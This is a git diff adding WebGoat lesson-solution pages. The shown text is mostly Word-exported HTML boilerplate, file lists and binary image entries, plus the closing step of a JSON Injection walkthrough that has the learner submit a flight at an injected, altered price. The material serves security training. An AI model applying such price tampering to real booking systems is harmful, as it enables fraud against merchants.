+ type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=460
+src="/WebGoat/lesson_solutions/JSONInjection_files/image016.jpg" v:shapes="Picture_x0020_80"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Updated price</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_81" o:spid="_x0000_i1026"
+ type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/JSONInjection_files/image017.jpg" v:shapes="Picture_x0020_81"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Injected result</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Select the flight
+with no stops and the updated price and click “Submit”.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_82"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/JSONInjection_files/image011.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/JSONInjection_files/image018.jpg" v:shapes="Picture_x0020_82"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>6</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson completed<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/JSONInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/JSONInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection_files/filelist.xml b/main/project/WebContent/lesson_solutions/JSONInjection_files/filelist.xml
new file mode 100644
index 000000000..3f7752feb
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/JSONInjection_files/filelist.xml
@@ -0,0 +1,18 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../JSONInjection.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image013.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image014.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image015.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image016.jpg"/>
+ <o:File HRef="image009.png"/>
+ <o:File HRef="image017.jpg"/>
+ <o:File HRef="image011.png"/>
+ <o:File HRef="image018.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection_files/image001.png b/main/project/WebContent/lesson_solutions/JSONInjection_files/image001.png
new file mode 100644
index 000000000..cfdb7b042
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JSONInjection_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection_files/image003.png b/main/project/WebContent/lesson_solutions/JSONInjection_files/image003.png
new file mode 100644
index 000000000..217f69bd7
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JSONInjection_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection_files/image005.png b/main/project/WebContent/lesson_solutions/JSONInjection_files/image005.png
new file mode 100644
index 000000000..affeaa193
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JSONInjection_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection_files/image007.png b/main/project/WebContent/lesson_solutions/JSONInjection_files/image007.png
new file mode 100644
index 000000000..709f70b6a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JSONInjection_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection_files/image009.png b/main/project/WebContent/lesson_solutions/JSONInjection_files/image009.png
new file mode 100644
index 000000000..b7d120e45
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JSONInjection_files/image009.png differ
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection_files/image011.png b/main/project/WebContent/lesson_solutions/JSONInjection_files/image011.png
new file mode 100644
index 000000000..3d93d05e5
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JSONInjection_files/image011.png differ
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection_files/image013.jpg b/main/project/WebContent/lesson_solutions/JSONInjection_files/image013.jpg
new file mode 100644
index 000000000..21504eb14
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JSONInjection_files/image013.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection_files/image014.jpg b/main/project/WebContent/lesson_solutions/JSONInjection_files/image014.jpg
new file mode 100644
index 000000000..cf6cc7471
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JSONInjection_files/image014.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection_files/image015.jpg b/main/project/WebContent/lesson_solutions/JSONInjection_files/image015.jpg
new file mode 100644
index 000000000..ccd96c071
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JSONInjection_files/image015.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection_files/image016.jpg b/main/project/WebContent/lesson_solutions/JSONInjection_files/image016.jpg
new file mode 100644
index 000000000..3710a91c1
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JSONInjection_files/image016.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection_files/image017.jpg b/main/project/WebContent/lesson_solutions/JSONInjection_files/image017.jpg
new file mode 100644
index 000000000..fecffb54d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JSONInjection_files/image017.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection_files/image018.jpg b/main/project/WebContent/lesson_solutions/JSONInjection_files/image018.jpg
new file mode 100644
index 000000000..f4edbeeb7
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JSONInjection_files/image018.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/JSONInjection_files/themedata.thmx b/main/project/WebContent/lesson_solutions/JSONInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/JSONInjection_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/JavaScriptValidation.html b/main/project/WebContent/lesson_solutions/JavaScriptValidation.html
new file mode 100644
index 000000000..58d4b79e7
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/JavaScriptValidation.html
@@ -0,0 +1,841 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/JavaScriptValidation_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/JavaScriptValidation_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>4</o:Revision>
+  <o:TotalTime>18</o:TotalTime>
+  <o:Created>2007-07-11T10:42:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:33:00Z</o:LastSaved>
+  <o:Pages>5</o:Pages>
+  <o:Words>352</o:Words>
+  <o:Characters>2007</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>16</o:Lines>
+  <o:Paragraphs>4</o:Paragraphs>
+  <o:CharactersWithSpaces>2355</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/JavaScriptValidation_files/themedata.thmx">
+<link rel=colorSchemeMapping
+href="/WebGoat/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
